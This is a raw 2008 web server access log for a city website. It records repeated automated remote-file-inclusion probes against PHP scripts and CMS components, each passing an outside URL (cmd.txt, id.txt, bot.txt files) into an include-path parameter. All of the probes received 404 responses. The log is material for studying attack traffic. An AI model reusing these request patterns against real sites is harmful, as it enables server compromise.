210.188.201.145 - - [30/Nov/2008:16:00:49 -0800] "GET /logs/access_080731.log//errors.php?error=http://n0b0dys1t3.iespana.es/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
210.188.201.145 - - [30/Nov/2008:16:00:50 -0800] "GET /logs//errors.php?error=http://n0b0dys1t3.iespana.es/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:16:01:59 -0800] "GET /include.php?path[docroot]=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:16:01:59 -0800] "GET /logs//include.php?path[docroot]=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:16:01:59 -0800] "GET /logs/access_080101.log//include.php?path[docroot]=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:16:02:59 -0800] "GET /logs/access_080201.log%20%20//include.php?path[docroot]=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:16:03:18 -0800] "GET /logs/access_071201.log%20%20//include.php?path[docroot]=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.98.128.36 - - [30/Nov/2008:16:05:06 -0800] "GET /logs/access_081031.log/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
216.98.128.36 - - [30/Nov/2008:16:05:06 -0800] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
216.98.128.36 - - [30/Nov/2008:16:05:06 -0800] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:16:11:49 -0800] "GET /logs/access_080201.log//include.php?path[docroot]=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
59.106.13.183 - - [30/Nov/2008:16:12:44 -0800] "GET /logs/access_071201.log//include.php?path[docroot]=http://geocities.com/feelcomz/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:16:14:57 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:16:14:57 -0800] "GET /logs/access_080401.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:16:14:57 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:16:17:25 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:16:17:26 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:16:17:26 -0800] "GET /logs/access_080401.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.57.150.98 - - [30/Nov/2008:16:20:43 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tecfedericotaylor.edu.gt/components/idne.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:16:21:30 -0800] "GET /logs/access_080801.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.92.152.68 - - [30/Nov/2008:16:23:02 -0800] "GET /logs/access_080901.log//skin/zero_vote/error.php?dir=http://share-files.eu/tmp/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:16:23:55 -0800] "GET /logs/access_080801.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:16:25:35 -0800] "GET /logs/access_080801.log%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
38.108.180.81 - - [30/Nov/2008:16:31:40 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "cityofarkadelphia.com"
38.108.180.81 - - [30/Nov/2008:16:31:41 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "Mozilla/5.0 (compatible; ScoutJet; +http://www.scoutjet.com/)" "cityofarkadelphia.com"
203.86.232.83 - - [30/Nov/2008:16:36:37 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.tecfedericotaylor.edu.gt/components/idne.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
69.57.150.98 - - [30/Nov/2008:16:41:27 -0800] "GET /logs/access_081031.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tecfedericotaylor.edu.gt/components/idne.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
69.57.150.98 - - [30/Nov/2008:16:41:27 -0800] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://www.tecfedericotaylor.edu.gt/components/idne.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
203.86.232.83 - - [30/Nov/2008:16:51:11 -0800] "GET /logs/access_081031.log//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.tecfedericotaylor.edu.gt/components/idne.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
203.86.232.83 - - [30/Nov/2008:16:51:12 -0800] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.tecfedericotaylor.edu.gt/components/idne.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:16:54:13 -0800] "GET /logs/access_080201.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:16:54:13 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:16:54:13 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:16:54:21 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:16:54:21 -0800] "GET /logs/access_080201.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:16:54:21 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
77.79.93.8 - - [30/Nov/2008:17:00:08 -0800] "GET /logs/access_081031.log/lostpasswd.php?env[include_prefix]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.79.93.8 - - [30/Nov/2008:17:00:08 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.79.93.8 - - [30/Nov/2008:17:00:08 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
38.98.60.188 - - [30/Nov/2008:17:01:57 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
77.79.93.8 - - [30/Nov/2008:17:02:12 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
38.98.60.188 - - [30/Nov/2008:17:02:36 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
38.98.60.188 - - [30/Nov/2008:17:02:36 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
38.98.60.188 - - [30/Nov/2008:17:03:15 -0800] "GET /errors.php?error=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
38.98.60.188 - - [30/Nov/2008:17:03:29 -0800] "GET /logs/errors.php?error=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
38.98.60.188 - - [30/Nov/2008:17:03:29 -0800] "GET /logs/access.log/errors.php?error=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:17:04:07 -0800] "GET /logs/access_080201.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:17:04:07 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:17:04:07 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:17:04:11 -0800] "GET /logs/access_080201.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:17:04:11 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:17:04:11 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:17:04:43 -0800] "GET /logs/access_071201.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:17:04:49 -0800] "GET /logs/access_071201.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
211.43.212.94 - - [30/Nov/2008:17:07:47 -0800] "GET /errors.php?page=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "cityofarkadelphia.com"
211.43.212.94 - - [30/Nov/2008:17:07:47 -0800] "GET /logs/errors.php?page=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "cityofarkadelphia.com"
211.43.212.94 - - [30/Nov/2008:17:07:47 -0800] "GET /logs/access_080329.log/errors.php?page=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "cityofarkadelphia.com"
207.44.134.23 - - [30/Nov/2008:17:08:59 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.moneytec.com/trader/request/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "cityofarkadelphia.com"
207.44.134.23 - - [30/Nov/2008:17:08:59 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.moneytec.com/trader/request/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "cityofarkadelphia.com"
85.214.37.182 - - [30/Nov/2008:17:09:09 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.catstrand.co.uk/modules/request/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "cityofarkadelphia.com"
85.214.37.182 - - [30/Nov/2008:17:09:09 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.catstrand.co.uk/modules/request/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "cityofarkadelphia.com"
211.43.212.94 - - [30/Nov/2008:17:10:19 -0800] "GET /logs/access_080329.log/errors.php?page=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "cityofarkadelphia.com"
211.43.212.94 - - [30/Nov/2008:17:10:19 -0800] "GET /logs/errors.php?page=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "cityofarkadelphia.com"
211.43.212.94 - - [30/Nov/2008:17:10:19 -0800] "GET /errors.php?page=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "cityofarkadelphia.com"
77.221.130.11 - - [30/Nov/2008:17:11:16 -0800] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.11 - - [30/Nov/2008:17:11:16 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
77.221.130.11 - - [30/Nov/2008:17:11:16 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:11:54 -0800] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:11:54 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:11:54 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:14:07 -0800] "GET /logs/access_080731.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:15:13 -0800] "GET /logs/access_080731.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:15:13 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:15:13 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:16:21 -0800] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:16:21 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:16:21 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:16:33 -0800] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:16:34 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:16:34 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:17:17:53 -0800] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.123.69.25 - - [30/Nov/2008:17:18:08 -0800] "GET /logs/access_080101.log//newspublish/include.php?path%5Bdocroot%5D=http://www.mfa.gov.bt/kethek-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:18:48 -0800] "GET /logs/access_080731.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:18:49 -0800] "GET /logs/access_080731.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:20:21 -0800] "GET /logs/access_080731.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:20:21 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:20:21 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:21:05 -0800] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:21:05 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:21:05 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:21:07 -0800] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:21:07 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:21:07 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
77.221.130.11 - - [30/Nov/2008:17:22:06 -0800] "GET /logs/access_081031.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:22:56 -0800] "GET /logs/access_081031.log//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:22:56 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:22:56 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
70.85.198.234 - - [30/Nov/2008:17:23:08 -0800] "GET /logs/access_080731.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:23:37 -0800] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:24:42 -0800] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:24:42 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
216.98.128.36 - - [30/Nov/2008:17:24:45 -0800] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
216.98.128.36 - - [30/Nov/2008:17:24:45 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
216.98.128.36 - - [30/Nov/2008:17:24:45 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:25:58 -0800] "GET /logs/access_081031.log//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:26:08 -0800] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
216.98.128.36 - - [30/Nov/2008:17:27:07 -0800] "GET /logs/access_080731.log//templates/mangobery/footer.sample.php?Site_Path=http://ragas.baarleweb.net/data/idbl.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
64.135.71.20 - - [30/Nov/2008:17:27:11 -0800] "GET /logs/access.log%20//init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
200.101.192.223 - - [30/Nov/2008:17:30:50 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
200.101.192.223 - - [30/Nov/2008:17:30:50 -0800] "GET /lostpasswd.php?env[include_prefix]=http://www.freeimagehosting.net/uploads/0f874de474.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "cityofarkadelphia.com"
